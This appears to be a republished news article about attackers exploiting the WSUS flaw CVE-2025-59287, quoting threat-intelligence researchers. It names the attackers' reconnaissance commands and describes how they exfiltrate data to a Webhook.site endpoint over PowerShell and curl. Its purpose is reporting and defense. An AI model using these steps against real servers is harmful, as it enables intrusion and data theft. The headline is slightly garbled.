Wsus Attacks Hit ‘multiple’ Orgs As Google And Other Infosec Sleuths Ringredmond’s Alarm Bell

More threat intel teams are sounding the alarm about a critical Windows Server Update Services (WSUS) remote code execution vulnerability, tracked as CVE-2025-59287 and now under active exploitation, just days after Microsoft pushed an emergency patch and the US Cybersecurity and Infrastructure Security Agency added the bug to its Known Exploited Vulnerabilities catalog.

Microsoft hasn’t updated its advice about the flaw to reveal to note the active in-the-wild exploitation detected by multiple credible sources. Redmond instead lists CVE-2025-59287 as not having been publicly disclosed, or exploited. The software giant does rate the bug as “exploitation more likely,” which may be the understatement of the month.

“We are actively investigating the exploitation of CVE-2025-59287 by a newly identified threat actor we are tracking as UNC6512, across multiple victim organizations,” Google Threat Intelligence Group (GTIG) said in an email, in response to The Register‘s questions.

“Following initial access, the actor has been observed executing a series of commands to conduct reconnaissance on the compromised host and the associated environment,” GTIG continued. “We have also observed exfiltration from impacted hosts.”

Microsoft declined to answer The Register‘s questions about reported attacks but pointed out it does not typically update security advisories post-release unless its initial post was inaccurate.

CVE-2025-59287, which affects Windows Server versions 2012 through 2025, stems from insecure deserialization of untrusted data and allows unauthenticated attackers to execute arbitrary code on vulnerable systems. Servers without the Windows Server Update Services (WSUS) role enabled aren’t affected.

We are seeing about 100,000 hits for exploitation of this bug within the last seven days

Microsoft initially issued a fix for CVE-2025-59287 on October’s Patch Tuesday, but it didn’t fully patch the security hole. Late last Thursday, Redmond pushed an emergency update.

Within hours of the emergency fix, incident responders and threat researchers started seeing active exploitation.

“We are seeing about 100,000 hits for exploitation of this bug within the last seven days based on our telemetry,” Dustin Childs, Trend Micro’s Zero Day Initiative head of threat awareness, told The Register.

“Our scans show that there are just under 500,000 internet facing servers with the WSUS service enabled,” Childs continued. “Due to the nature of the bug, we expect just about every affected server to be hit at some point. However, what exploitation we are seeing seems indiscriminate and not targeted at a specific sector or region. We also expect to see the rate of compromise increase over time unless patches and other remediations are implemented.”

‘Catastrophic’ potential for downstream victims

Also as of Monday, Palo Alto Networks’ Unit 42 team “observed limited impacted customers,” Justin Moore, Unit 42 senior manager of threat intel research, told The Register.

“While WSUS by default shouldn’t be accessible via the internet, in cases where it is exposed, the potential is catastrophic for downstream entities,” he added.

Unit 42’s analysis to date indicates that the unknown attackers exploiting the Microsoft flaw remain focused on gaining initial access and performing internal network reconnaissance.

The attackers target publicly exposed WSUS instances on their default TCP ports, 8530 (HTTP) and 8531 (HTTPS).

And once they’ve broken in, they execute PowerShell commands and hoover up data about the internal network environment, including whoami, net user /domain, and ipconfig /all. Then they exfiltrate the stolen details to a remote, attacker-controlled Webhook.site endpoint using a PowerShell payload that attempts Invoke-WebRequest and falls back to curl.exe if needed, according to Unit 42.

“Considering this is an unauthenticated vulnerability with low attack complexity, the scope of exploitation may appear initially low on the surface due to the relatively limited number of exposed WSUS servers,” Moore said. “However, the actual downstream effects could be great yet difficult to assess.”

Moore said the team doesn’t yet have any evidence indicating a specific attacker or threat group is responsible for attacks on the flaw. But “when a vulnerability with ease of attack and a proof-of-concept is available, any opportunistic threat actors will capitalize,” he noted.

At least one proof-of-concept has been available since at least October 21.

“We’ve only observed system information being exfiltrated thus far, but ultimately the goal would be to utilize the compromised server to push malicious software to enterprises via the update service for maximum effect,” Moore said.

On Patch Tuesday, Childs warned that it was very likely miscreants would soon target this bug. That view was prescient and on Monday Childs told us “The fact that the initial patch was bypassed is disconcerting for several reasons.”

“I called this CVE out on my blog because I saw what potential an exploit could cause,” he said. “It’s something that threat actors look for when deciding to reverse engineer patches. It’s normally difficult to find bugs – unless it’s Patch Tuesday, where Microsoft tells you what bugs exist. If the patch doesn’t fully address the vulnerability, the existence of a patch actually increases the risk to enterprises. It leads people to think they are protected when in fact they aren’t.”

Microsoft has problems with patches that don’t fully fix flaws, he added. Remember SharePoint?

“We need to start holding them accountable not only for the patches that break functionality,” Childs said, “but also for the patches that don’t fix the security issues they document.” ®

Original Source